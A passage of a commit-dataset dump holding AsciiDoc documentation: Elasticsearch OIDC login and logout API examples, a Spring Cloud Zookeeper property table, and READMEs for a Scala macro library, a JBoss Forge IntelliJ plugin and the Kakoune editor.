authenticating as the `facilitator` user - passing the URL\n where the user's browser was redirected to, as a parameter, along with the\n values for `nonce` and `state` it had saved in the user's session previously. If more than one\n OpenID Connect realms are configured, the custom web app can specify the name of the realm to be\n used for handling this, but this parameter is optional. For more details, see\n <<security-api-oidc-authenticate>>.\n+\n[source,console]\n-----------------------------------------------------------------------\nPOST \/_security\/oidc\/authenticate\n{\n \"redirect_uri\" : \"https:\/\/oidc-kibana.elastic.co:5603\/api\/security\/oidc\/callback?code=jtI3Ntt8v3_XvcLzCFGq&state=4dbrihtIAt3wBTwo6DxK-vdk-sSyDBV8Yf0AjdkdT5I\",\n \"state\" : \"4dbrihtIAt3wBTwo6DxK-vdk-sSyDBV8Yf0AjdkdT5I\",\n \"nonce\" : \"WaBPH0KqPVdG5HHdSxPRjfoZbXMCicm5v1OiAj0DUFM\",\n \"realm\" : \"oidc1\"\n}\n-----------------------------------------------------------------------\n\/\/ TEST[catch:unauthorized]\n+\nElasticsearch will validate this and if all is correct will respond with an access token that can be used\nas a `Bearer` token for subsequent requests and a refresh token that can be later used to refresh the given\naccess token as described in <<security-api-get-token>>.\n. At some point, if necessary, the custom web application can log the user out by using the\n<<security-api-oidc-logout,OIDC logout API>> passing the access token and refresh token as parameters. 
For example:\n+\n[source,console]\n--------------------------------------------------\nPOST \/_security\/oidc\/logout\n{\n \"token\" : \"dGhpcyBpcyBub3QgYSByZWFsIHRva2VuIGJ1dCBpdCBpcyBvbmx5IHRlc3QgZGF0YS4gZG8gbm90IHRyeSB0byByZWFkIHRva2VuIQ==\",\n \"refresh_token\": \"vLBPvmAB6KvwvJZr27cS\"\n}\n--------------------------------------------------\n\/\/ TEST[catch:request]\n+\nIf the realm is configured accordingly, this may result in a response with a `redirect` parameter indicating where\nthe user needs to be redirected in the OP in order to complete the logout process.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"efb01a1c5e77f3439656ef8859052cda22f05401","subject":"Bumping versions","message":"Bumping versions","repos":"spring-cloud\/spring-cloud-zookeeper,spring-cloud\/spring-cloud-zookeeper","old_file":"docs\/src\/main\/asciidoc\/_configprops.adoc","new_file":"docs\/src\/main\/asciidoc\/_configprops.adoc","new_contents":"|===\n|Name | Default | Description\n\n|spring.cloud.zookeeper.base-sleep-time-ms | `50` | Initial amount of time to wait between retries.\n|spring.cloud.zookeeper.block-until-connected-unit | | The unit of time related to blocking on connection to Zookeeper.\n|spring.cloud.zookeeper.block-until-connected-wait | `10` | Wait time to block on connection to Zookeeper.\n|spring.cloud.zookeeper.connect-string | `localhost:2181` | Connection string to the Zookeeper cluster.\n|spring.cloud.zookeeper.connection-timeout | | The configured connection timeout in milliseconds.\n|spring.cloud.zookeeper.dependencies | | Mapping of alias to ZookeeperDependency. From LoadBalancer perspective the alias is actually serviceID since SC LoadBalancer can't accept nested structures in serviceID.\n|spring.cloud.zookeeper.dependency-configurations | | \n|spring.cloud.zookeeper.dependency-names | | \n|spring.cloud.zookeeper.discovery.enabled | `true` | \n|spring.cloud.zookeeper.discovery.initial-status | | The initial status of this instance (defaults to {@link StatusConstants#STATUS_UP}).\n|spring.cloud.zookeeper.discovery.instance-host | | Predefined host with which a service can register itself in Zookeeper. Corresponds to the {code address} from the URI spec.\n|spring.cloud.zookeeper.discovery.instance-id | | Id used to register with zookeeper. Defaults to a random UUID.\n|spring.cloud.zookeeper.discovery.instance-port | | Port to register the service under (defaults to listening port).\n|spring.cloud.zookeeper.discovery.instance-ssl-port | | Ssl port of the registered service.\n|spring.cloud.zookeeper.discovery.metadata | | Gets the metadata name\/value pairs associated with this instance. 
This information is sent to zookeeper and can be used by other instances.\n|spring.cloud.zookeeper.discovery.order | `0` | Order of the discovery client used by `CompositeDiscoveryClient` for sorting available clients.\n|spring.cloud.zookeeper.discovery.register | `true` | Register as a service in zookeeper.\n|spring.cloud.zookeeper.discovery.root | `\/services` | Root Zookeeper folder in which all instances are registered.\n|spring.cloud.zookeeper.discovery.uri-spec | `{scheme}:\/\/{address}:{port}` | The URI specification to resolve during service registration in Zookeeper.\n|spring.cloud.zookeeper.enabled | `true` | Is Zookeeper enabled.\n|spring.cloud.zookeeper.max-retries | `10` | Max number of times to retry.\n|spring.cloud.zookeeper.max-sleep-ms | `500` | Max time in ms to sleep on each retry.\n|spring.cloud.zookeeper.prefix | | Common prefix that will be applied to all Zookeeper dependencies' paths.\n|spring.cloud.zookeeper.session-timeout | | The configured\/negotiated session timeout in milliseconds. Please refer to <a href='https:\/\/cwiki.apache.org\/confluence\/display\/CURATOR\/TN14'>Curator's Tech Note 14<\/a> to understand how Curator implements connection sessions. @see <a href='https:\/\/cwiki.apache.org\/confluence\/display\/CURATOR\/TN14'>Curator's Tech Note 14<\/a>\n\n|===","old_contents":"|===\n|Name | Default | Description\n\n|spring.cloud.zookeeper.base-sleep-time-ms | `50` | Initial amount of time to wait between retries.\n|spring.cloud.zookeeper.block-until-connected-unit | `` | The unit of time related to blocking on connection to Zookeeper.\n|spring.cloud.zookeeper.block-until-connected-wait | `10` | Wait time to block on connection to Zookeeper.\n|spring.cloud.zookeeper.connect-string | `localhost:2181` | Connection string to the Zookeeper cluster.\n|spring.cloud.zookeeper.connection-timeout | `` | The configured connection timeout in milliseconds.\n|spring.cloud.zookeeper.dependencies | `` | Mapping of alias to ZookeeperDependency. From LoadBalancer perspective the alias is actually serviceID since SC LoadBalancer can't accept nested structures in serviceID.\n|spring.cloud.zookeeper.dependency-configurations | `` | \n|spring.cloud.zookeeper.dependency-names | `` | \n|spring.cloud.zookeeper.discovery.enabled | `true` | \n|spring.cloud.zookeeper.discovery.initial-status | `` | The initial status of this instance (defaults to {@link StatusConstants#STATUS_UP}).\n|spring.cloud.zookeeper.discovery.instance-host | `` | Predefined host with which a service can register itself in Zookeeper. Corresponds to the {code address} from the URI spec.\n|spring.cloud.zookeeper.discovery.instance-id | `` | Id used to register with zookeeper. Defaults to a random UUID.\n|spring.cloud.zookeeper.discovery.instance-port | `` | Port to register the service under (defaults to listening port).\n|spring.cloud.zookeeper.discovery.instance-ssl-port | `` | Ssl port of the registered service.\n|spring.cloud.zookeeper.discovery.metadata | `` | Gets the metadata name\/value pairs associated with this instance. 
This information is sent to zookeeper and can be used by other instances.\n|spring.cloud.zookeeper.discovery.order | `0` | Order of the discovery client used by `CompositeDiscoveryClient` for sorting available clients.\n|spring.cloud.zookeeper.discovery.register | `true` | Register as a service in zookeeper.\n|spring.cloud.zookeeper.discovery.root | `\/services` | Root Zookeeper folder in which all instances are registered.\n|spring.cloud.zookeeper.discovery.uri-spec | `{scheme}:\/\/{address}:{port}` | The URI specification to resolve during service registration in Zookeeper.\n|spring.cloud.zookeeper.enabled | `true` | Is Zookeeper enabled.\n|spring.cloud.zookeeper.max-retries | `10` | Max number of times to retry.\n|spring.cloud.zookeeper.max-sleep-ms | `500` | Max time in ms to sleep on each retry.\n|spring.cloud.zookeeper.prefix | `` | Common prefix that will be applied to all Zookeeper dependencies' paths.\n|spring.cloud.zookeeper.session-timeout | `` | The configured\/negotiated session timeout in milliseconds. Please refer to <a href='https:\/\/cwiki.apache.org\/confluence\/display\/CURATOR\/TN14'>Curator's Tech Note 14<\/a> to understand how Curator implements connection sessions. @see <a href='https:\/\/cwiki.apache.org\/confluence\/display\/CURATOR\/TN14'>Curator's Tech Note 14<\/a>\n\n|===","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"303c9a54247ac0a6eb557530dcc8cac4c4fe11ee","subject":"work on readme [skip ci]","message":"work on readme [skip ci]\n","repos":"S-Mach\/s_mach.codetools","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"= s_mach.codetools: Macro, codegen and code utility library\nLance Gatlin <lance.gatlin@gmail.com>\nv1,27-Dec-2014\n:blogpost-status: unpublished\n:blogpost-categories: s_mach, scala\n\nimage:https:\/\/travis-ci.org\/S-Mach\/s_mach.codetools.svg[Build Status, link=\"https:\/\/travis-ci.org\/S-Mach\/s_mach.codetools\"] image:https:\/\/coveralls.io\/repos\/S-Mach\/s_mach.codetools\/badge.png?branch=master[Test Coverage,link=\"https:\/\/coveralls.io\/r\/S-Mach\/s_mach.codetools\"] https:\/\/github.com\/S-Mach\/s_mach.codetools[Code] http:\/\/s-mach.github.io\/s_mach.codetools\/#s_mach.codetools.package[Scaladoc]\n\n+s_mach.codetools+ is an open-source Scala macro, codegen and code utility\nlibrary.\n\n== Features\n* IsValueClass[A]: A base trait for a user-defined value-class that standardizes the name of\nthe value-class val to \"underlying\" and toString to underlying toString. This\nallows creating an implicit conversion from an instance of any value-class to its\nunderlying representation.\n* IsDistinctTypeAlias[A]: marker trait used to mark a type alias as being a distinct type alias (DTA).\nA DTA is an alternative to the Scala value-class\n(http:\/\/docs.scala-lang.org\/overviews\/core\/value-classes.html) that\nnever needs to box (or unbox) since type aliases are eliminated in byte code.\n* +Result[A]+: a better +scala.util.Try+ that allows accumulating errors,\nwarnings and other issues in addition to storing failure or success. Returned\nby most +BlackboxHelper+ methods.\n* +BlackboxHelper+: a wrapper trait that provides utility types and methods to\nassist in macro generation, specifically for generating type-class\nimplementations for product types.\n** +BlackboxHelper.ProductType+: a case class for storing the matching\napply\/unapply methods and field info of a product type. 
Has utility methods for\ntype-class implementation generation.\n** +BlackboxHelper.calcProductType+: method to attempt to compute a +ProductType+\nfor a given type. Works for all case classes, tuple types and any other type\nwhose companion object contains a matching apply\/unapply method pair (See\n+ProductType+ section below for details).\n* +ReflectPrint+: a demonstration type-class which can create the Scala code\nnecessary for recreating an instance with the same value (See\n+reflectPrint.printApply+).\n* +ReflectPrintMacroBuilderImpl+: a reference implementation of a type-class\nblackbox macro generator that uses +BlackboxHelper+. The macro implementation\ncan generate a +ReflectPrint+ implementation for any product type.\n* +ReflectPrintTest+: tests for the generated +ReflectPrint+ for various common\nADT patterns (See +testdata+) in lieu of direct testing of +BlackboxHelper+\nsince there is currently no blackbox.Context mock available.\n\n== Include in SBT\n1. Add to +build.sbt+\n+\n[source,sbt,numbered]\n----\nlibraryDependencies += \"net.s_mach\" %% \"codetools\" % \"1.0.4\"\n----\nNOTE: +s_mach.codetools+ is based on blackbox macro support, present only in Scala 2.11+\n\n== Versioning\n+s_mach.codetools+ uses semantic versioning (http:\/\/semver.org\/).\n+s_mach.codetools+ does not use the package private modifier. Instead, all code\nfiles outside of the +s_mach.codetools.impl+ package form the public interface\nand are governed by the rules of semantic versioning. Code files inside the\n+s_mach.codetools.impl+ package may be used by downstream applications and\nlibraries. However, no guarantees are made as to the stability or interface of\ncode in the +s_mach.codetools.impl+ package between versions.\n\n== In Detail: +Product Type+\nA +product type+ is any type that can be expressed as a sequence of fields whose\ntypes are either data types (e.g. Int, String, etc.) or other product types.\nProduct types are\nhttp:\/\/en.wikipedia.org\/wiki\/Algebraic_data_type[algebraic data types] that can\nbe decomposed into an ordered sequence of fields. Each field consists of an\nindex within the sequence, a field name and a field type.\n\nIn +s_mach.codetools+, product types are computed by finding the first\nunapply\/apply method pair in the type's companion object with matching type\nsignatures. The type signature of an apply method is equal to the sequence of\nthe types of its arguments. Unapply methods may have one or two type signatures\nbased on their return type. First, the outer Option of the return type is\ndiscarded, leaving only the inner type. If the inner type is a tuple type,\nthen both the tuple type and the list of tuple type parameters form possible\ntype signatures for the unapply method. Otherwise, if the inner type parameter\nis not a tuple type, then the type signature of the unapply method is equal to\nthe single type parameter. Once an apply\/unapply match is made, the symbols of\nthe apply method's argument list are used to extract the product type fields\nfor the type. For tuple types and case classes, this will be the list of its\nfields.\n\n.Example 1:\n----\nclass A(...) { ... 
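  \/\/ class body elided; only the companion object's matching apply\/unapply pair below is used to derive the product type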
}\nobject A {\n def apply(i: Int, s: String) : A = ???\n def apply(i: Int, s: String, f: Float) : A = ???\n def unapply(a: A) : Option[(Int,String)] = ???\n}\n----\n* The first apply method's type signature = +Int :: String :: Nil+\n* Possible unapply method's type signatures = +((Int,String) :: Nil) ::: (Int :: String :: Nil)+\n* Product type fields = +(\"i\",Int) :: (\"s\",String) :: Nil+\n\n.Example 2:\n----\nclass B(...) { ... }\nobject B {\n def apply(tuple: (String,Int)) : B = ???\n def apply(i: Int, s: String) : B = ???\n def unapply(b: B) : Option[(String,Int)] = ???\n}\n----\n* The first apply method's type signature = +(String,Int) :: Nil+\n* Possible unapply method's type signatures = +((String,Int) :: Nil) ::: (String :: Int :: Nil)+\n* Product type fields = +(\"tuple\",(String,Int)) :: Nil+\n\n.Example 3:\n----\nclass Enum(...) { ... }\nobject Enum {\n def apply(value: String) : Enum = ???\n def unapply(e: Enum) : Option[String] = ???\n}\n----\n* The first apply method's type signature = +String :: Nil+\n* Possible unapply method's type signatures = +String :: Nil+\n* Product type fields = +(\"value\",String) :: Nil+\n\n.Example 4:\n----\ncase class CaseClass(i: Int, s: String)\n----\n* The first apply method's type signature = +Int :: String :: Nil+\n* Possible unapply method's type signatures = +((Int,String) :: Nil) ::: (Int :: String :: Nil)+\n* Product type fields = +(\"i\",Int) :: (\"s\",String) :: Nil+\n\n.Example 5:\n----\nclass Tuple2[T1,T2](val _1: T1,val _2 : T2)\n----\n* The first apply method's type signature = +T1 :: T2 :: Nil+\n* Possible unapply method's type signatures = +((T1,T2) :: Nil) ::: (T1 :: T2 :: Nil)+\n* Product type fields = +(\"_1\",T1) :: (\"_2\",T2) :: Nil+\n\n== Example: ReflectPrint\n----\nWelcome to Scala version 2.11.1 (Java HotSpot(TM) 64-Bit Server VM, Java 1.7.0_72).\nType in expressions to have them evaluated.\nType :help for more information.\n\nscala> :paste\n\/\/ Entering paste mode (ctrl-D to finish)\n\nimport s_mach.codetools.reflectPrint._\n\ncase class Movie(\n name: String,\n year: Int\n)\n\nobject Movie {\n implicit val reflectPrint_Movie = ReflectPrint.forProductType[Movie]\n}\n\ncase class Name(\n firstName: String,\n middleName: Option[String],\n lastName: String\n)\n\nobject Name {\n implicit val reflectPrint_Name = ReflectPrint.forProductType[Name]\n}\n\n\ncase class Actor(\n name: Name,\n age: Int,\n movies: Set[Movie]\n)\n\nobject Actor {\n implicit val reflectPrint_Person = ReflectPrint.forProductType[Actor]\n}\n\nval n1 = Name(\"Gary\",Some(\"Freakn\"),\"Oldman\")\nval n2 = Name(\"Guy\",None,\"Pearce\")\nval n3 = Name(\"Lance\",None,\"Gatlin\")\n\nval m1 = Movie(\"The Professional\",1994)\nval m2 = Movie(\"The Fifth Element\",1997)\nval m3 = Movie(\"Memento\",1994)\nval m4 = Movie(\"Prometheus\",2012)\n\nval a1 = Actor(n1,56,Set(m1,m2))\nval a2 = Actor(n2,47,Set(m3,m4))\nval a3 = Actor(n3,37,Set.empty)\n\n\/\/ Exiting paste mode, now interpreting.\n\nimport s_mach.codetools.reflectPrint._\ndefined class Movie\ndefined object Movie\ndefined class Name\ndefined object Name\ndefined class Actor\ndefined object Actor\nn1: Name = Name(Gary,Some(Freakn),Oldman)\nn2: Name = Name(Guy,None,Pearce)\nn3: Name = Name(Lance,None,Gatlin)\nm1: Movie = Movie(The Professional,1994)\nm2: Movie = Movie(The Fifth Element,1997)\nm3: Movie = Movie(Memento,1994)\nm4: Movie = Movie(Prometheus,2012)\na1: Actor = Actor(Name(Gary,Some(Freakn),Oldman),56,Set(Movie(The Professional,1994), Movie(The Fifth Element,1997)))\na2: Actor = 
Actor(Name(Guy,None,Pearce),47,Set(Movie(Memento,1994), Movie(Prometheus,2012)))\na3: Actor = Actor(Name(Lance,None,Gatlin),37,Set())\n\nscala> a1.printApply\nres0: String = Actor(name=Name(firstName=\"Gary\",middleName=Some(\"Freakn\"),lastName=\"Oldman\"),age=56,movies=Set(Movie(name=\"The Professional\",year=1994),Movie(name=\"The Fifth Element\",year=1997)))\n\nscala> val alt1 = Actor(name=Name(firstName=\"Gary\",middleName=Some(\"Freakn\"),lastName=\"Oldman\"),age=56,movies=Set(Movie(name=\"The Professional\",year=1994),Movie(name=\"The Fifth Element\",year=1997)))\nalt1: Actor = Actor(Name(Gary,Some(Freakn),Oldman),56,Set(Movie(The Professional,1994), Movie(The Fifth Element,1997)))\n\nscala> alt1 == a1\nres1: Boolean = true\n\nscala> a1.printUnapply\nres2: String = (Name(firstName=\"Gary\",middleName=Some(\"Freakn\"),lastName=\"Oldman\"),56,Set(Movie(name=\"The Professional\",year=1994),Movie(name=\"The Fifth Element\",year=1997)))\n\nscala> val ualt1 = (Name(firstName=\"Gary\",middleName=Some(\"Freakn\"),lastName=\"Oldman\"),56,Set(Movie(name=\"The Professional\",year=1994),Movie(name=\"The Fifth Element\",year=1997)))\nualt1: (Name, Int, scala.collection.immutable.Set[Movie]) = (Name(Gary,Some(Freakn),Oldman),56,Set(Movie(The Professional,1994), Movie(The Fifth Element,1997)))\n\nscala> ualt1 == Actor.unapply(a1).get\nres3: Boolean = true\n\nscala> import ReflectPrintFormat.Implicits.verbose\nimport ReflectPrintFormat.Implicits.verbose\n\nscala> a2.printApply\nres4: String =\nActor(\n name = Name(\n firstName = \"Guy\",\n middleName = None,\n lastName = \"Pearce\"\n ),\n age = 47,\n movies = Set(\n Movie(\n name = \"Memento\",\n year = 1994\n ),\n Movie(\n name = \"Prometheus\",\n year = 2012\n )\n )\n)\n\nscala> a3.printApply\nres5: String =\nActor(\n name = Name(\n firstName = \"Lance\",\n middleName = None,\n lastName = \"Gatlin\"\n ),\n age = 37,\n movies = Set.empty\n)\n----\n","old_contents":"","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"}
{"commit":"cd0de041f1e3bcc45162f5b1d86b1b3e4a34811d","subject":"Updated README","message":"Updated README\n","repos":"forge\/intellij-idea-plugin,forge\/intellij-idea-plugin","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"== JBoss Forge IntelliJ IDEA Plugin\n\nPublished in http:\/\/plugins.jetbrains.com\/plugin\/7515\n\nProvides support for http:\/\/forge.jboss.org\/[JBoss Forge] commands and wizards in IntelliJ IDEA.\n\nTo show a list of commands press `Ctrl+Alt+4`. On Mac OS X, use `Command + Option + 4`.\n\n=== Installation and usage\n\nThe plugin is available in the IntelliJ IDEA repository under the name \"JBoss Forge IDEA Plugin\"\n(go to `Settings > Plugins > Browse repositories...` to install).\n\n==== JDK Version\n\nThis plugin should work with *JDK 8* and above.\n\n=== Building\n\nThis plugin uses Gradle as its build tool, together with the IntelliJ Gradle plugin.\n\n=== Debugging\n\nTo debug the plugin in IntelliJ IDEA, you need to install the `Intellij plugin development with Maven` plugin first.\nThat will allow you to run a second instance of the IDE, in which you can test and debug the plugin.\n\nAfter installing this plugin, you can add a plugin run\/debug configuration.\nTo do that, go to `Run -> Edit Configurations...` and add a _Plugin_ configuration.\n\nThis configuration should start a new IntelliJ window. In case the plugin is not installed, you will need\nto install it manually in IDE settings and run it again.\n
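\nNOTE: When the Gradle import succeeds, the IntelliJ Gradle plugin conventionally also provides a task that launches a sandboxed IDE with the plugin preinstalled. The exact task name depends on the plugin version, so treat the following as a sketch rather than a guaranteed command:\n\n----\n.\/gradlew runIde\n----\n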
","old_contents":"== JBoss Forge IntelliJ IDEA Plugin\n\nPublished in http:\/\/plugins.jetbrains.com\/plugin\/7515\n\nProvides support for http:\/\/forge.jboss.org\/[JBoss Forge] commands and wizards in IntelliJ IDEA.\n\n=== Installation and usage\n\nPlugin is available in IntelliJ IDEA repository under the name \"JBoss Forge IDEA Plugin\"\n(go to `Settings > Plugins > Browse repositories...` to install).\n\n==== JDK Version\n\nThis plugin only works with *JDK 7*. The following exception will appear if you install it and run in JDK6 :\n \n Plugin 'org.jboss.forge.plugin.idea' failed to initialize and will be disabled. Please restart IntelliJ IDEA.\n \n com.intellij.diagnostic.PluginException: org\/jboss\/forge\/plugin\/idea\/service\/ForgeService : Unsupported major.minor version 51.0 [Plugin: org.jboss.forge.plugin.idea]\n \nIntelliJ Idea runs on JDK 6 by default. \nMake sure to change the default IDE VM use JDK7 by following instructions provided in link:https:\/\/intellij-support.jetbrains.com\/entries\/23455956-Selecting-the-JDK-version-the-IDE-will-run-under[here].\n\n\nTo show a list of commands press `Ctrl+Alt+4`.\n\n=== Build and debug\n\nTo build the plugin, you need to have IntelliJ libraries installed in your Maven repository.\nIf you're Linux\/Mac user, you can use `install-intellij-libs.sh` script, if that doesn't work, you can\ninstall those JARs manually (only dependencies from POM are required).\n\nAfter that, you can build the plugin with `mvn package` command (add `-DskipTests` if you don't have\nForge addons installed in your repository). The resulting ZIP file in `target\/` directory can\nbe installed by going to `Settings > Plugins > Install plugin from disk...`.\n\nTo debug the plugin in IntelliJ IDEA, you need to install `Intellij plugin development with Maven` plugin first.\nThat will allow you to run a second instance of the IDE, in which you can test and debug the plugin.\n\nAfter installing this plugin, you can add a plugin run\/debug configuration.\nTo do that, go to `Run -> Edit Configurations...` and add _Plugin_ configuration.\n\nThis configuration should start a new IntelliJ window. 
In case the plugin is not installed, you will need\nto install it manually in IDE settings and run it again.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b963d0b11cbbf5017608878b4ec49fe9db4abe55","subject":"update the readme for highlighters doc","message":"update the readme for highlighters doc\n","repos":"jkonecny12\/kakoune,casimir\/kakoune,mawww\/kakoune,alpha123\/kakoune,danielma\/kakoune,Asenar\/kakoune,rstacruz\/kakoune,lenormf\/kakoune,elegios\/kakoune,jjthrash\/kakoune,Asenar\/kakoune,rstacruz\/kakoune,alpha123\/kakoune,Somasis\/kakoune,Somasis\/kakoune,xificurC\/kakoune,ekie\/kakoune,Asenar\/kakoune,lenormf\/kakoune,ekie\/kakoune,Somasis\/kakoune,flavius\/kakoune,lenormf\/kakoune,occivink\/kakoune,danielma\/kakoune,zakgreant\/kakoune,ekie\/kakoune,mawww\/kakoune,flavius\/kakoune,jkonecny12\/kakoune,rstacruz\/kakoune,ekie\/kakoune,Asenar\/kakoune,alpha123\/kakoune,Somasis\/kakoune,flavius\/kakoune,danielma\/kakoune,danr\/kakoune,occivink\/kakoune,jjthrash\/kakoune,alpha123\/kakoune,casimir\/kakoune,elegios\/kakoune,zakgreant\/kakoune,jkonecny12\/kakoune,danielma\/kakoune,elegios\/kakoune,lenormf\/kakoune,zakgreant\/kakoune,jkonecny12\/kakoune,Somasis\/kakoune,zakgreant\/kakoune,mawww\/kakoune,danr\/kakoune,elegios\/kakoune,jjthrash\/kakoune,danr\/kakoune,occivink\/kakoune,mawww\/kakoune,occivink\/kakoune,xificurC\/kakoune,alexherbo2\/kakoune,danr\/kakoune,jjthrash\/kakoune,xificurC\/kakoune,alexherbo2\/kakoune,casimir\/kakoune,xificurC\/kakoune,casimir\/kakoune,flavius\/kakoune,rstacruz\/kakoune","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"Kakoune\n=======\n\nIntroduction:\n-------------\n\nKakoune is a code editor heavily inspired by Vim; as such, most of its\ncommands are similar to vi's.\n\nKakoune can operate in two modes, normal and insertion. In insertion mode,\nkeys are directly inserted into the current buffer. In normal mode, keys\nare used to manipulate the current selection and to enter insertion mode.\n\nKakoune has a strong focus on interactivity: most commands provide immediate\nand incremental results, while still being competitive (as in keystroke count)\nwith Vim.\n\nKakoune works on selections, which are oriented, inclusive ranges of characters;\nselections have an anchor and a cursor character. 
Most commands move both of\nthem, except when extending a selection, where the anchor character stays fixed\nand the cursor one moves around.\n\nSee http:\/\/vimeo.com\/82711574\n\nJoin us on freenode IRC +#Kakoune+\n\nFeatures\n--------\n\n * Multiple selections as a central way of interacting\n * Powerful selection manipulation primitives\n - Select all regex matches in current selections\n - Keep selections containing\/not containing a match for a given regex\n - Split current selections with a regex\n - Text objects (paragraph, sentence, nestable blocks)\n * Powerful text manipulation primitives\n - Align selections\n - Rotate selection contents\n - Case manipulation\n - Indentation\n - Piping each selection to an external filter\n * Client-Server architecture\n - Multiple clients on the same editing session\n - Use tmux or your X11 window manager to manage windows\n * Simple interaction with external programs\n * Automatic contextual help\n * Automatic as-you-type completion\n * Macros\n * Hooks\n * Syntax Highlighting\n\nBuilding\n--------\n\nKakoune dependencies are:\n\n * A C++11 compliant compiler (GCC >= 4.8.1 or clang >= 3.4)\n * boost (>= 1.50)\n * ncurses with wide-character support (>= 5.3, generally referred to as libncursesw)\n\nTo build, just type *make* in the src directory.\n\nKakoune can be built on Linux, MacOS, and Cygwin. Due to Kakoune relying heavily\non being in a Unix-like environment, no native Windows version is planned.\n\nTo setup a basic configuration on your account, type *make userconfig* in the\nsrc directory; this will set up an initial $XDG_CONFIG_HOME\/kak directory. See\nthe _Kakrc_ section for more information.\n\nInstalling\n----------\n\nIn order to install kak on your system, rather than running it directly from\nits source directory, type *make install*; you can specify the +PREFIX+ and\n+DESTDIR+ if needed.\n\nNote that by default, no script files will be read if you do not add links\nto them in $XDG_CONFIG_HOME\/kak\/autoload. Available script files will be\ninstalled in $PREFIX\/share\/kak\/rc.\n\nIf you want to enable all files, set $XDG_CONFIG_HOME\/kak\/autoload to be\na symbolic link to the $PREFIX\/share\/kak\/rc directory.\n\n----------------------------------------------\nln -s \/usr\/share\/kak\/rc ~\/.config\/kak\/autoload\n----------------------------------------------\n\nRunning\n-------\n\nJust running *kak* launches a new kak session with a client on the local terminal.\n*kak* accepts some switches:\n\n * +-c <session>+: connect to the given session, sessions are unix sockets\n +\/tmp\/kak-<session>+\n * +-e <commands>+: execute commands on startup\n * +-n+: ignore the kakrc file\n * +-s <session>+: set the session name, by default it will be the pid\n of the initial kak process.\n * +-d+: run Kakoune in daemon mode, without user interface. This requires\n the session name to be specified with -s. In this mode, the Kakoune\n server will keep running even if there is no connected client, and\n will quit when receiving SIGTERM.\n * +-p <session>+: read stdin, and then send its content to the given session,\n acting as a remote control.\n\n
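For instance, a plausible multi-client workflow (session name hypothetical):\n\n----------------------------------------------\nkak -s demo foo.c\nkak -c demo\necho \"echo hello\" | kak -p demo\n----------------------------------------------\n\nThe first command starts a session named demo and opens foo.c, the second\nconnects another client to that session, and the third sends the +echo+\ncommand to the session as a remote control.\n\n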
At startup, if +-n+ is not specified, Kakoune will try to source the file\n..\/share\/kak\/kakrc relative to the kak binary. This kak file will then try\nto source $XDG_CONFIG_HOME\/kak\/kakrc (with $XDG_CONFIG_HOME defaulting to\n$HOME\/.config), and any files in $XDG_CONFIG_HOME\/kak\/autoload.\n\nThe common pattern is to add links in $XDG_CONFIG_HOME\/kak\/autoload to the\nscripts in $PREFIX\/share\/kak\/rc that the user wants sourced at kak launch.\n\nBasic Movement\n--------------\n\n * _space_: select the character under last selection end\n * _alt-space_: flip the selections direction\n\n * _h_: select the character on the left of selection end\n * _j_: select the character below the selection end\n * _k_: select the character above the selection end\n * _l_: select the character on the right of selection end\n\n * _w_: select the word and following whitespaces on the right of selection end\n * _b_: select preceding whitespaces and the word on the left of selection end\n * _e_: select preceding whitespaces and the word on the right of selection end\n * _alt-[wbe]_: same as [wbe] but select WORD instead of word\n\n * _x_: select line on which selection end lies (or next line when end lies on\n an end-of-line)\n * _alt-x_: expand selections to contain full lines (including end-of-lines)\n * _alt-X_: trim selections to only contain full lines (not including last\n end-of-line)\n\n * _%_: select whole buffer\n\n * _alt-H_: select to line begin\n * _alt-L_: select to line end\n\n * _\/_: search (select next match)\n * _?_: search (extend to next match)\n * _n_: select next match\n * _N_: add a new selection with next match\n * _alt-n_: replace main selection with next match (preserving the others)\n\n * _pageup_: scroll up\n * _pagedown_: scroll down\n\n * _alt-r_: rotate selections (the main selection becomes the next one)\n\nA word is a sequence of alphanumeric characters or underscores; a WORD is a\nsequence of non-whitespace characters.\n\nAppending\n---------\n\nFor most selection commands, using shift extends the current selection\ninstead of replacing it. 
For example, _wWW_ selects 3 consecutive words.\n\nUsing Counts\n------------\n\nMost selection commands also support counts, which are entered before the\ncommand itself.\n\nFor example, _3W_ selects 3 consecutive words and _3w_ selects the third word on\nthe right of selection end.\n\n * _space_: when used with count, keep only the count-th selection\n * _alt-space_: when used with count, remove the count-th selection\n\nChanges\n-------\n\n * _i_: insert before current selection\n * _a_: insert after current selection\n * _d_: yank and delete current selection\n * _D_: yank concatenated and delete current selection (see _Y_)\n * _c_: yank and delete current selection and insert\n * _._: repeat last insert mode change (_i_, _a_, or _c_, including\n the inserted text)\n\n * _I_: insert at current selection begin line start\n * _A_: insert at current selection end line end\n * _o_: insert in a new line below current selection end\n * _O_: insert in a new line above current selection begin\n\n * _y_: yank selections\n * _Y_: yank selections concatenated (only one yank, containing\n all selections concatenated)\n * _p_: paste after current selection end\n * _P_: paste before current selection begin\n * _alt-p_: replace current selection with yanked text\n\n * _alt-j_: join selected lines\n * _alt-J_: join selected lines and select spaces inserted\n in place of line breaks\n\n * _>_: indent selected lines\n * _<_: deindent selected lines\n * _alt->_: indent selected lines, including empty lines\n * _alt-<_: deindent selected lines, do not remove incomplete\n indent (3 leading spaces when indent is 4)\n\n * _|_: pipe each selection through the given external filter program\n and replace the selection with its output (see the example after this list).\n * _alt-|_: pipe each selection through the given external filter program\n and append its output to the selection.\n\n * _u_: undo last change\n * _U_: redo last change\n\n * _r_: replace each character with the next entered one\n * _&_: align selections: align the cursors of the selections by inserting\n spaces before the first character of the selection\n * _alt-&_: copy indent, copy the indentation of the main selection\n (or the count one if a count is given) to all other ones\n\n * _`_: to lower case\n * _~_: to upper case\n * _alt-`_: swap case\n\n * _@_: convert tabs to spaces in current selections, uses the buffer\n tabstop option or the count parameter for tabstop.\n * _alt-@_: convert spaces to tabs in current selections, uses the buffer\n tabstop option or the count parameter for tabstop.\n\n * _alt-R_: rotate selection contents; if given, the count groups\n selections, so +3<a-R>+ rotates (1, 2, 3) and (4, 5, 6)\n independently.\n\n
